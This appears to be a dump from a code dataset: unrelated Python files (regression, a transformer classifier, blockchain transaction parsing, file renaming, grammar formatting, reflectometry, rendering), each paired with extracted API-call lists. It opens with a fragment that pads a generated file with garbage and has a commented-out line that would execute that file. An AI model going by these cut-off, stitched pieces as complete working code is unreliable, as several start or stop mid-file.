############################################################################################
########################## !Delete the '#' at own risk! ############################
############################################################################################
# Makes the file heavier if the option is selected.
+ "\n" + amountOfExtraGarbage * extraGarbage)
f.close()
#This executes the first file.
#os.system(targetDirectory + name + ".py")
############################################################################################
############################################################################################
############################################################################################
|
[
"getpass.getuser"
] |
[((1507, 1516), 'getpass.getuser', 'getuser', ([], {}), '()\n', (1514, 1516), False, 'from getpass import getuser\n')]
|
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from shared_utilities import find_linearReg_optimal_test_size
from shared_utilities import plot_linear_reg
from shared_utilities import check_outlier
from shared_utilities import plot_scatter
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
if __name__ == '__main__':
    # Load the Real Estate dataset: features are columns 1..n-2, the last
    # column is the regression target.
    df = pd.read_csv('Real estate.csv')
    X = df.iloc[:, 1:-1]
    y = df.iloc[:, -1]
    plot_scatter(X.iloc[:, 2], y, 'scatter.png')

    # Standardize features before PCA — PCA is scale-sensitive.
    # (Removed leftover debug code that dumped X to "values.txt" and then
    # raised an unconditional Exception, making everything below unreachable.)
    sc = StandardScaler()
    X_scaled = sc.fit_transform(X)

    # PCA for feature reduction; 'mle' lets the solver choose the dimension.
    pca = PCA(n_components='mle', svd_solver='full', random_state=42)
    X_pca = pca.fit_transform(X_scaled)
    print(X_pca.min(), X_pca.max())

    test_size = find_linearReg_optimal_test_size(X, y)
    X_train, X_test, y_train, y_test = train_test_split(X_pca, y, test_size=test_size, random_state=42)

    # Fit a linear model and evaluate on the held-out split.
    mdl = LinearRegression().fit(X_train, y_train)
    y_pred = mdl.predict(X_test)
    score = r2_score(y_test, y_pred)
    # plot_linear_reg('linear_reg.png', y_pred, X_test.iloc[:, 2], y_test)
|
[
"shared_utilities.plot_scatter",
"sklearn.preprocessing.StandardScaler",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.r2_score",
"sklearn.linear_model.LinearRegression",
"sklearn.decomposition.PCA",
"shared_utilities.find_linearReg_optimal_test_size"
] |
[((495, 525), 'pandas.read_csv', 'pd.read_csv', (['"""Real estate.csv"""'], {}), "('Real estate.csv')\n", (506, 525), True, 'import pandas as pd\n'), ((580, 624), 'shared_utilities.plot_scatter', 'plot_scatter', (['X.iloc[:, 2]', 'y', '"""scatter.png"""'], {}), "(X.iloc[:, 2], y, 'scatter.png')\n", (592, 624), False, 'from shared_utilities import plot_scatter\n'), ((649, 665), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (663, 665), False, 'from sklearn.preprocessing import StandardScaler\n'), ((833, 892), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '"""mle"""', 'svd_solver': '"""full"""', 'random_state': '(42)'}), "(n_components='mle', svd_solver='full', random_state=42)\n", (836, 892), False, 'from sklearn.decomposition import PCA\n'), ((985, 1023), 'shared_utilities.find_linearReg_optimal_test_size', 'find_linearReg_optimal_test_size', (['X', 'y'], {}), '(X, y)\n', (1017, 1023), False, 'from shared_utilities import find_linearReg_optimal_test_size\n'), ((1063, 1127), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_pca', 'y'], {'test_size': 'test_size', 'random_state': '(42)'}), '(X_pca, y, test_size=test_size, random_state=42)\n', (1079, 1127), False, 'from sklearn.model_selection import train_test_split\n'), ((1225, 1249), 'sklearn.metrics.r2_score', 'r2_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1233, 1249), False, 'from sklearn.metrics import r2_score\n'), ((1139, 1157), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1155, 1157), False, 'from sklearn.linear_model import LinearRegression\n')]
|
import pandas as pd
import torch
import torch.nn as nn
from transformers.modeling_outputs import SequenceClassifierOutputWithPast
from ..src.model.hart import HaRTPreTrainedModel
class ArHulmForSequenceClassification(HaRTPreTrainedModel):
    """Sequence-classification wrapper over the HaRT/ArHuLM transformer.

    Runs the history-aware transformer, aggregates the per-block user states
    according to ``agg_type``, dumps the aggregated states to CSV under
    ``output_dir``, and returns them as logits. No real loss is computed —
    this forward path is for extracting user states, not training.
    """
    # _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]
    def __init__(self, config, output_dir, agg_type, arhulm=None):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.use_history_output = config.use_history_output
        # Linear scoring head (defined here but not applied in forward()).
        self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
        self.output_dir = output_dir
        # One of: 'last', 'sum', 'avg', 'masked_last', 'masked_sum', 'masked_avg'.
        self.agg_type = agg_type
        if arhulm:
            self.transformer = arhulm
        else:
            self.transformer = HaRTPreTrainedModel(config)
        self.init_weights()

        # Model parallel
        self.model_parallel = False
        self.device_map = None

    def forward(
        self,
        input_ids=None,
        user_ids=None,
        history=None,
        past_key_values=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        use_cache=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
            Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
            config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
            If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        transformer_outputs = self.transformer(
            input_ids,
            history=history,
            output_block_last_hidden_states=True,
            past_key_values=past_key_values,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        # Repeat each user id once per hidden dimension so it can be paired
        # with the stacked state values in the CSV dump below.
        # NOTE(review): hidden size 768 is hard-coded — confirm config.n_embd.
        users = pd.DataFrame(user_ids.cpu().detach().numpy(), columns=['user_id'])
        users = users.loc[users.index.repeat(768)]
        users.reset_index(drop=True, inplace=True)

        # Aggregate per-block user states (history[0]); the 'masked_*'
        # variants weight each block with the masks in history[1].
        if self.agg_type=='last':
            user_states = transformer_outputs.history[0][-1]
        elif self.agg_type=='sum':
            all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)
        elif self.agg_type=='avg':
            all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)/all_blocks_user_states.shape[1]
        elif self.agg_type=='masked_last':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1).cpu().detach()
            all_blocks_masks = torch.stack(masks, dim=1)
            # Index of the last unmasked block per user = sum(mask) - 1.
            divisor = torch.sum(all_blocks_masks, dim=1).cpu().detach()
            user_states = all_blocks_user_states[range(all_blocks_user_states.shape[0]), divisor.squeeze()-1]
        elif self.agg_type=='masked_sum':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1)
            user_states = torch.sum(all_blocks_user_states, dim=1)
        elif self.agg_type=='masked_avg':
            states = transformer_outputs.history[0]
            masks = transformer_outputs.history[1]
            multiplied = tuple(l * r for l, r in zip(states, masks))
            all_blocks_user_states = torch.stack(multiplied, dim=1)
            all_blocks_masks = torch.stack(masks, dim=1)
            sum = torch.sum(all_blocks_user_states, dim=1)
            divisor = torch.sum(all_blocks_masks, dim=1)
            user_states = sum/divisor

        logits = user_states
        # Dummy constant loss — kept only to satisfy the output contract.
        loss = torch.Tensor([0.1]).cuda()

        # Dump the aggregated states as long-format CSV:
        # one (user_id, column_number, value) row per hidden dimension.
        user_states = pd.DataFrame(user_states.cpu().detach().numpy())
        user_states = user_states.stack().reset_index()
        user_states['level_0'] = users['user_id']
        user_states.rename(columns={'level_0':'user_id','level_1': 'column_number', 0:'value'}, inplace=True)
        user_states.to_csv(self.output_dir + '/test_states_' + str(user_ids[0].item()) + '.csv', index=False)

        return SequenceClassifierOutputWithPast(
            loss=loss,
            logits=logits,
            past_key_values=transformer_outputs.past_key_values,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
|
[
"torch.stack",
"torch.nn.Linear",
"torch.Tensor",
"transformers.modeling_outputs.SequenceClassifierOutputWithPast",
"torch.sum"
] |
[((559, 612), 'torch.nn.Linear', 'nn.Linear', (['config.n_embd', 'self.num_labels'], {'bias': '(False)'}), '(config.n_embd, self.num_labels, bias=False)\n', (568, 612), True, 'import torch.nn as nn\n'), ((5028, 5241), 'transformers.modeling_outputs.SequenceClassifierOutputWithPast', 'SequenceClassifierOutputWithPast', ([], {'loss': 'loss', 'logits': 'logits', 'past_key_values': 'transformer_outputs.past_key_values', 'hidden_states': 'transformer_outputs.hidden_states', 'attentions': 'transformer_outputs.attentions'}), '(loss=loss, logits=logits, past_key_values=\n transformer_outputs.past_key_values, hidden_states=transformer_outputs.\n hidden_states, attentions=transformer_outputs.attentions)\n', (5060, 5241), False, 'from transformers.modeling_outputs import SequenceClassifierOutputWithPast\n'), ((2824, 2874), 'torch.stack', 'torch.stack', (['transformer_outputs.history[0]'], {'dim': '(1)'}), '(transformer_outputs.history[0], dim=1)\n', (2835, 2874), False, 'import torch\n'), ((2901, 2941), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (2910, 2941), False, 'import torch\n'), ((4587, 4606), 'torch.Tensor', 'torch.Tensor', (['[0.1]'], {}), '([0.1])\n', (4599, 4606), False, 'import torch\n'), ((3014, 3064), 'torch.stack', 'torch.stack', (['transformer_outputs.history[0]'], {'dim': '(1)'}), '(transformer_outputs.history[0], dim=1)\n', (3025, 3064), False, 'import torch\n'), ((3091, 3131), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (3100, 3131), False, 'import torch\n'), ((3493, 3518), 'torch.stack', 'torch.stack', (['masks'], {'dim': '(1)'}), '(masks, dim=1)\n', (3504, 3518), False, 'import torch\n'), ((3952, 3982), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (3963, 3982), False, 'import torch\n'), ((4009, 4049), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), 
'(all_blocks_user_states, dim=1)\n', (4018, 4049), False, 'import torch\n'), ((4301, 4331), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (4312, 4331), False, 'import torch\n'), ((4363, 4388), 'torch.stack', 'torch.stack', (['masks'], {'dim': '(1)'}), '(masks, dim=1)\n', (4374, 4388), False, 'import torch\n'), ((4407, 4447), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (4416, 4447), False, 'import torch\n'), ((4470, 4504), 'torch.sum', 'torch.sum', (['all_blocks_masks'], {'dim': '(1)'}), '(all_blocks_masks, dim=1)\n', (4479, 4504), False, 'import torch\n'), ((3416, 3446), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (3427, 3446), False, 'import torch\n'), ((3541, 3575), 'torch.sum', 'torch.sum', (['all_blocks_masks'], {'dim': '(1)'}), '(all_blocks_masks, dim=1)\n', (3550, 3575), False, 'import torch\n')]
|
import logging
from terra import util_terra
from terra.execute_type import (
_execute_type,
)
from .zap import (
handle_zap_into_strategy,
handle_zap_out_of_strategy,
)
def handle(exporter, elem, txinfo, index):
execute_msg = util_terra._execute_msg(elem, index)
if "send" in execute_msg:
msg = execute_msg["send"]["msg"]
# Apollo
if "zap_into_strategy" in msg:
return handle_zap_into_strategy(exporter, elem, txinfo)
if "zap_out_of_strategy" in msg:
return handle_zap_out_of_strategy(exporter, elem, txinfo)
execute_type = _execute_type(elem, txinfo, index)
logging.info("[apollo] General transaction type=%s txid=%s", execute_type, elem["txhash"])
return execute_type
|
[
"logging.info",
"terra.util_terra._execute_msg",
"terra.execute_type._execute_type"
] |
[((243, 279), 'terra.util_terra._execute_msg', 'util_terra._execute_msg', (['elem', 'index'], {}), '(elem, index)\n', (266, 279), False, 'from terra import util_terra\n'), ((617, 651), 'terra.execute_type._execute_type', '_execute_type', (['elem', 'txinfo', 'index'], {}), '(elem, txinfo, index)\n', (630, 651), False, 'from terra.execute_type import _execute_type\n'), ((656, 750), 'logging.info', 'logging.info', (['"""[apollo] General transaction type=%s txid=%s"""', 'execute_type', "elem['txhash']"], {}), "('[apollo] General transaction type=%s txid=%s', execute_type,\n elem['txhash'])\n", (668, 750), False, 'import logging\n')]
|
"""
Developed by: <NAME> (2018)
This script rename all files in the specified directory to lowercase and then replace all white space with hyphen (-).
"""
import os
import sys
import glob
import argparse
# Print welcome message
print("\nDeveloped by: <NAME> (2018)\n"
"This script rename all files in the specified directory to lowercase.\n"
"and then replace all white space with hyphen (-).\n")
# Set up the argument variables
parser = argparse.ArgumentParser()
parser.add_argument("working_directory", help="Path to a working directory")
args = parser.parse_args()
working_directory = args.working_directory
# Get the iterator in case file list is so large
file_list = glob.iglob(os.path.join(working_directory, '*'))
print("Beginning the process...")
for f in file_list:
# Don't process a directory
if os.path.isdir(f):
continue
# Get only filename
filename = os.path.basename(f)
# Split filename and extension
filename_split = os.path.splitext(filename)
# Change to filename lowercase and replace whitespace with hyphen then concat with extension again
new_f = os.path.join(working_directory, filename_split[0].replace(" ", "-").lower() + filename_split[1])
# Rename old file name to new file name
os.renames(f, new_f)
# Print feedback to user
print("'" + f + "' has been renamed.")
print("Process finished successfully.\n")
|
[
"argparse.ArgumentParser",
"os.path.basename",
"os.path.isdir",
"os.path.splitext",
"os.renames",
"os.path.join"
] |
[((453, 478), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (476, 478), False, 'import argparse\n'), ((699, 735), 'os.path.join', 'os.path.join', (['working_directory', '"""*"""'], {}), "(working_directory, '*')\n", (711, 735), False, 'import os\n'), ((832, 848), 'os.path.isdir', 'os.path.isdir', (['f'], {}), '(f)\n', (845, 848), False, 'import os\n'), ((906, 925), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (922, 925), False, 'import os\n'), ((982, 1008), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (998, 1008), False, 'import os\n'), ((1269, 1289), 'os.renames', 'os.renames', (['f', 'new_f'], {}), '(f, new_f)\n', (1279, 1289), False, 'import os\n')]
|
from typing import Dict, Tuple, Callable, Any
from pe._constants import Operator
from pe._errors import Error
from pe._escape import escape
DOT = Operator.DOT
LIT = Operator.LIT
CLS = Operator.CLS
RGX = Operator.RGX
SYM = Operator.SYM
OPT = Operator.OPT
STR = Operator.STR
PLS = Operator.PLS
AND = Operator.AND
NOT = Operator.NOT
CAP = Operator.CAP
BND = Operator.BND
SEQ = Operator.SEQ
CHC = Operator.CHC
RUL = Operator.RUL
DEF = Operator.DEF
DBG = Operator.DBG
class Definition:
"""An abstract definition of a parsing expression."""
__slots__ = 'op', 'args',
def __init__(self, op: Operator, args: Tuple[Any, ...]):
self.op = op
self.args = args
def __repr__(self):
return f'({self.op}, {self.args!r})'
def __str__(self):
return _format(self, None)
def __eq__(self, other: object):
if not isinstance(other, Definition):
return NotImplemented
return (self.op == other.op
and self.args == other.args)
def format(self) -> str:
return _format(self, DEF)
def _format_dot(defn: Definition, prev_op: Operator) -> str:
return '.'
def _format_literal(defn: Definition, prev_op: Operator) -> str:
return f'''"{escape(defn.args[0], ignore="'[]")}"'''
def _format_class(defn: Definition, prev_op: Operator) -> str:
def esc(s):
return escape(s, ignore='"\'')
clsstr = ''.join(f'{esc(a)}-{esc(b)}' if b else esc(a)
for a, b in defn.args[0])
if defn.args[1]:
return f'''(![{clsstr}] .)'''
else:
return f'''[{clsstr}]'''
def _format_regex(defn: Definition, prev_op: Operator) -> str:
return f'`{defn.args[0]}`' # temporary syntax
def _format_nonterminal(defn: Definition, prev_op: Operator) -> str:
return defn.args[0]
_format_decorators: Dict[Operator, Tuple[str, str, str]] = {
OPT: ('', '', '?'),
STR: ('', '', '*'),
PLS: ('', '', '+'),
AND: ('&', '', ''),
NOT: ('!', '', ''),
CAP: ('~', '', ''),
BND: ('{}:', '', ''),
SEQ: ('', ' ', ''),
CHC: ('', ' / ', ''),
RUL: ('', '', ' -> {}'),
}
def _format_recursive(defn: Definition, prev_op: Operator) -> str:
op = defn.op
args = defn.args
prefix, delimiter, suffix = _format_decorators[op]
fmt = '({})' if prev_op and op.precedence <= prev_op.precedence else '{}'
if delimiter:
body = delimiter.join(_format(d, op) for d in args[0])
else:
body = _format(args[0], op)
body = body.replace('{', '{{').replace('}', '}}')
return fmt.format((prefix + body + suffix).format(*args[1:]))
def _format_debug(defn: Definition, prev_op: Operator) -> str:
return _format(defn.args[0], prev_op)
_Formatter = Callable[[Definition, Operator], str]
_format_map: Dict[Operator, _Formatter] = {
DOT: _format_dot,
LIT: _format_literal,
CLS: _format_class,
RGX: _format_regex,
SYM: _format_nonterminal,
OPT: _format_recursive,
STR: _format_recursive,
PLS: _format_recursive,
AND: _format_recursive,
NOT: _format_recursive,
CAP: _format_recursive,
BND: _format_recursive,
SEQ: _format_recursive,
CHC: _format_recursive,
RUL: _format_recursive,
DBG: _format_debug,
}
def _format(defn: Definition,
prev_op: Operator) -> str:
try:
func = _format_map[defn.op]
except KeyError:
raise Error(f'invalid operation: {defn.op!r}')
return func(defn, prev_op)
|
[
"pe._escape.escape",
"pe._errors.Error"
] |
[((1374, 1397), 'pe._escape.escape', 'escape', (['s'], {'ignore': '""""\'"""'}), '(s, ignore=\'"\\\'\')\n', (1380, 1397), False, 'from pe._escape import escape\n'), ((1237, 1271), 'pe._escape.escape', 'escape', (['defn.args[0]'], {'ignore': '"""\'[]"""'}), '(defn.args[0], ignore="\'[]")\n', (1243, 1271), False, 'from pe._escape import escape\n'), ((3409, 3449), 'pe._errors.Error', 'Error', (['f"""invalid operation: {defn.op!r}"""'], {}), "(f'invalid operation: {defn.op!r}')\n", (3414, 3449), False, 'from pe._errors import Error\n')]
|
import numpy as np
import cmath
from functools import reduce
from math import pi, ceil
from numpy import sin, cos
from scipy.interpolate import interp1d
"""
References:
[Majkrzak2003] <NAME>, <NAME>: Physica B 336 (2003) 27-38
Phase sensitive reflectometry and the unambiguous determination
of scattering length density profiles
"""
def interpolate(x, fx):
return interp1d(x, fx, bounds_error=False, fill_value=0)
def refr_idx(q, sld):
"""
Calculates the refractive index with given SLD [\AA^{-2}] and wavevector transfer q [
\AA^{-1}]. The units can be arbitrary choosen, but they must satisfy that sld/q**2 has
unit [1]. The arguments should not be scaled by any constants.
For example
q = 0.01
sld = 1e-6
The refractive index is complex if q < q_c (being the critical edge) and it is
completely real if q >= q_c.
"""
return cmath.sqrt(1 - 16 * pi * sld / (q ** 2))
def reflection_matrix(q, sld, thickness, as_matrix=False):
"""
Calculates a reflection matrix used for calculating the reflectivity of
a slab of material (sld, thickness) for the wave vector transfer q.
See <NAME>, <NAME>: Physical Review B Vol. 52 Nr 15, 1995:
Exact determination of the phase in neutron reflectometry, Equation (1)
If as_matrix is True, a matrix 2x2 will be returned, if not, then the matrix
indices are returned as a, b, c, d
"""
n = refr_idx(q, sld)
theta = 0.5 * q * n * thickness
a, b, c, d = cos(theta), 1 / n * sin(theta), -n * sin(theta), cos(theta)
if as_matrix:
return np.array([[a, b], [c, d]])
return a, b, c, d
class SLDProfile(object):
def __init__(self):
pass
def as_matrix(self, q):
"""
Returns the matrix coefficients in the abeles formalism.
Returns w, x, y, z corresponding to the matrix [[w, x], [y, z]]
"""
return 0, 0, 0, 0
class ConstantSLDProfile(SLDProfile):
def __init__(self, sld, thickness, sigma=0):
if sld > 15:
raise RuntimeError("SLD seems to be unreasonable high")
self._sld = float(sld)
self._d = float(thickness)
self._r = float(sigma)
if self._r > 0:
raise NotImplementedError("Roughness not implemented yet")
def as_matrix(self, q):
return reflection_matrix(q, self._sld, self._d)
class ConcatSLDProfile(SLDProfile):
"""
The first element in sld_profiles is closest to the substrate
"""
def __init__(self, sld_profiles, reverse=False):
self._slds = sld_profiles
self._reverse = reverse
def as_matrix(self, q):
m = len(self._slds) * [None]
for i in range(0, len(self._slds)):
a, b, c, d = self._slds[i].as_matrix(q)
m[i] = np.array([[a, b], [c, d]])
if self._reverse:
m = list(reversed(m))
m = np.linalg.multi_dot(m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class FunctionSLDProfile(SLDProfile):
def __init__(self, function, support, dx=0.1):
self._f = function
self._supp = support
self._dx = dx
self._xspace = np.linspace(support[0], support[1],
ceil((support[1] - support[0]) * 1 / dx))
self._feval = [self._f(x) for x in self._xspace]
self._m = [ConstantSLDProfile(fx, dx) for fx in self._feval]
self._concat = ConcatSLDProfile(self._m, reverse=False)
def as_matrix(self, q):
return self._concat.as_matrix(q)
class SlabsSLDProfile(SLDProfile):
def __init__(self, z, rho):
self._z = z
self._rho = rho
@classmethod
def from_sample(cls, sample, dz=0.1, dA=1e-4, probe=None):
from refl1d.probe import NeutronProbe
from refl1d.profile import Microslabs
if probe is None:
# The values T and L do not matter for 'just' building the SLD profile
probe = NeutronProbe(T=[1.0], L=[1.0])
slabs = Microslabs(1, dz)
sample.render(probe, slabs)
slabs.finalize(True, dA)
# ignore the imaginary part, this should be zero anyway
z, rho, irho = slabs.smooth_profile(dz)
if any(irho >= 1e-2):
raise RuntimeWarning("Sample contains absorptive SLD (imag >= 1e-2). "
"Reconstruction techniques do not support this.")
# refl1d likes to use SLD * 1e6
return cls(z, rho * 1e-6)
@classmethod
def from_slabs(cls, thickness, sld, roughness, precision=1):
# You should rather use the from_sample method, since its easier to
# understand. This method here is just a kind of 'fallback'
# if you don't wanna have the overhead of building the Stacks in refl1d
# just to put the data in here..
#
# WARNING: from_slabs and from_sample do not create the same slab profile
# they are shifted profiles (by I'd guess 3*roughness[0]?)
from refl1d.profile import build_profile
w = thickness
sld = sld
# Means, the first layer is the substrate and we only have to include
# the roughness effect. To do so, select a proper thickness (> 0) such
# that the convolution with the gaussian kernel is sufficiently approximated
if w[0] == 0:
# refl1d uses 3 sigma usually
# why 3?
# that's 3 sigma and the gaussian smoothing is nearly zero out there
# thus the 'substrate' layer is big enough to be approximated by this
# ofc bigger sigma values (>= 5) are better, but they need more
# computation
w[0] = 3 * roughness[0]
z = np.linspace(0, sum(w) + roughness[-1] * 5, int(precision * sum(w)) + 1)
offsets = np.cumsum(w)
rho = build_profile(z, offsets, roughness, sld)
return cls(z, rho)
def thickness(self):
return max(self._z) - min(self._z)
def plot_profile(self, offset=0, reverse=False):
import pylab
rho = self._rho
if reverse:
rho = list(reversed(self._rho))
pylab.plot(self._z + offset, rho)
def as_matrix(self, q):
# len(dz) = len(self._z) - 1
dz = np.diff(self._z)
m = len(dz) * [None]
for idx in range(0, len(dz)):
m[idx] = reflection_matrix(q, self._rho[idx], dz[idx], as_matrix=True)
# There is still some potential here
# Whats happening here:
# m1 * m2 * m3 * m4 * m5 ... in a sequentially manner
# maybe it's faster if you do something like
# (m1 * m2) * (m3 * m4) * ...
# and redo the grouping in the next step. this should be then O(log n)
# compared to the seq. multiplication which is O(n)....
# BUT: this has to be done in C code, not in a python implementation :/
m = reduce(np.dot, m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class Reflectivity(object):
def __init__(self, sld_profile, fronting, backing):
assert isinstance(sld_profile, SLDProfile)
self._sld = sld_profile
self._f, self._b = fronting, backing
# The input should be of the magnitude 1e-6 ... 1e-5
if any(abs(np.array([fronting, backing])) >= 1e-1):
raise RuntimeWarning("Given fronting/backing SLD values are too high")
def reflection(self, q_space, as_function=True):
r = np.ones(len(q_space), dtype=complex)
for idx, q in enumerate(q_space):
if abs(q) < 1e-10:
continue
# See [Majkrzak2003] equation (17)
f, h = refr_idx(q, self._f), refr_idx(q, self._b)
A, B, C, D = self._sld.as_matrix(q)
r[idx] = (f * h * B + C + 1j * (f * D - h * A)) / \
(f * h * B - C + 1j * (f * D + h * A))
if as_function:
return self.to_function(r, q_space, square=False)
else:
return r
@staticmethod
def to_function(r, q_space, square=False):
real = interpolate(q_space, r.real)
imag = interpolate(q_space, r.imag)
if square:
return lambda q: real(q)**2 + imag(q)**2
else:
return lambda q: real(q) + 1j * imag(q)
def reflectivity(self, q_space):
r = self.reflection(q_space)
return lambda q: abs(r(q)) ** 2
def plot(self, q_space):
import pylab
R = self.reflectivity(q_space)
pylab.plot(q_space, R(q_space))
return R
|
[
"cmath.sqrt",
"math.ceil",
"refl1d.profile.Microslabs",
"refl1d.profile.build_profile",
"refl1d.probe.NeutronProbe",
"numpy.cumsum",
"numpy.diff",
"numpy.array",
"numpy.sin",
"numpy.cos",
"functools.reduce",
"scipy.interpolate.interp1d",
"pylab.plot",
"numpy.linalg.multi_dot"
] |
[((399, 448), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'fx'], {'bounds_error': '(False)', 'fill_value': '(0)'}), '(x, fx, bounds_error=False, fill_value=0)\n', (407, 448), False, 'from scipy.interpolate import interp1d\n'), ((918, 956), 'cmath.sqrt', 'cmath.sqrt', (['(1 - 16 * pi * sld / q ** 2)'], {}), '(1 - 16 * pi * sld / q ** 2)\n', (928, 956), False, 'import cmath\n'), ((1526, 1536), 'numpy.cos', 'cos', (['theta'], {}), '(theta)\n', (1529, 1536), False, 'from numpy import sin, cos\n'), ((1575, 1585), 'numpy.cos', 'cos', (['theta'], {}), '(theta)\n', (1578, 1585), False, 'from numpy import sin, cos\n'), ((1620, 1646), 'numpy.array', 'np.array', (['[[a, b], [c, d]]'], {}), '([[a, b], [c, d]])\n', (1628, 1646), True, 'import numpy as np\n'), ((2929, 2951), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['m'], {}), '(m)\n', (2948, 2951), True, 'import numpy as np\n'), ((4032, 4049), 'refl1d.profile.Microslabs', 'Microslabs', (['(1)', 'dz'], {}), '(1, dz)\n', (4042, 4049), False, 'from refl1d.profile import Microslabs\n'), ((5834, 5846), 'numpy.cumsum', 'np.cumsum', (['w'], {}), '(w)\n', (5843, 5846), True, 'import numpy as np\n'), ((5861, 5902), 'refl1d.profile.build_profile', 'build_profile', (['z', 'offsets', 'roughness', 'sld'], {}), '(z, offsets, roughness, sld)\n', (5874, 5902), False, 'from refl1d.profile import build_profile\n'), ((6174, 6207), 'pylab.plot', 'pylab.plot', (['(self._z + offset)', 'rho'], {}), '(self._z + offset, rho)\n', (6184, 6207), False, 'import pylab\n'), ((6288, 6304), 'numpy.diff', 'np.diff', (['self._z'], {}), '(self._z)\n', (6295, 6304), True, 'import numpy as np\n'), ((6922, 6939), 'functools.reduce', 'reduce', (['np.dot', 'm'], {}), '(np.dot, m)\n', (6928, 6939), False, 'from functools import reduce\n'), ((1546, 1556), 'numpy.sin', 'sin', (['theta'], {}), '(theta)\n', (1549, 1556), False, 'from numpy import sin, cos\n'), ((1563, 1573), 'numpy.sin', 'sin', (['theta'], {}), '(theta)\n', (1566, 1573), False, 'from numpy 
import sin, cos\n'), ((2828, 2854), 'numpy.array', 'np.array', (['[[a, b], [c, d]]'], {}), '([[a, b], [c, d]])\n', (2836, 2854), True, 'import numpy as np\n'), ((3266, 3306), 'math.ceil', 'ceil', (['((support[1] - support[0]) * 1 / dx)'], {}), '((support[1] - support[0]) * 1 / dx)\n', (3270, 3306), False, 'from math import pi, ceil\n'), ((3984, 4014), 'refl1d.probe.NeutronProbe', 'NeutronProbe', ([], {'T': '[1.0]', 'L': '[1.0]'}), '(T=[1.0], L=[1.0])\n', (3996, 4014), False, 'from refl1d.probe import NeutronProbe\n'), ((7286, 7315), 'numpy.array', 'np.array', (['[fronting, backing]'], {}), '([fronting, backing])\n', (7294, 7315), True, 'import numpy as np\n')]
|
import os
import mitsuba
import numpy as np
import argparse
import utils
mitsuba.set_variant('scalar_spectral')
from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct
from mitsuba.python.xml import WriteXML
from enoki.scalar import *
import open3d as o3d
from plyfile import PlyData, PlyElement
from render import gravity_aligned_mobb
def cvt_rgba2float(filename, tmp_out_file):
plydata = PlyData.read(filename)
x = np.asarray(plydata['vertex']['x'])
y = np.asarray(plydata['vertex']['y'])
z = np.asarray(plydata['vertex']['z'])
red = plydata['vertex']['red'].astype('float32') / 255.
green = plydata['vertex']['green'].astype('float32') / 255.
blue = plydata['vertex']['blue'].astype('float32') / 255.
vertices = np.vstack((x, y, z, red, green, blue)).transpose()
ply_vertices = [tuple(x) for x in vertices.tolist()]
ply_vertices = np.array(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
('red', 'f4'), ('green', 'f4'), ('blue', 'f4')])
el = PlyElement.describe(ply_vertices, 'vertex')
plydata.elements = [el, plydata['face']]
plydata.write(os.path.join(os.path.dirname(filename), tmp_out_file))
return vertices
def mts_render(filename, vertices, output):
data = {"type": "scene", "./": {"type": "path"}}
shape_dict = {
"type": "ply", 'filename': filename,
"mybsdf": {
"type": "diffuse",
"reflectance": {
"type": "mesh_attribute",
"name": "vertex_color"
# "type": "rgb",
# "value": [231. / 255, 181. / 255, 75. / 255],
}
}
}
emitter_dict = {"type": "constant"}
sensor_dict = {
"type": "perspective",
'fov': 60,
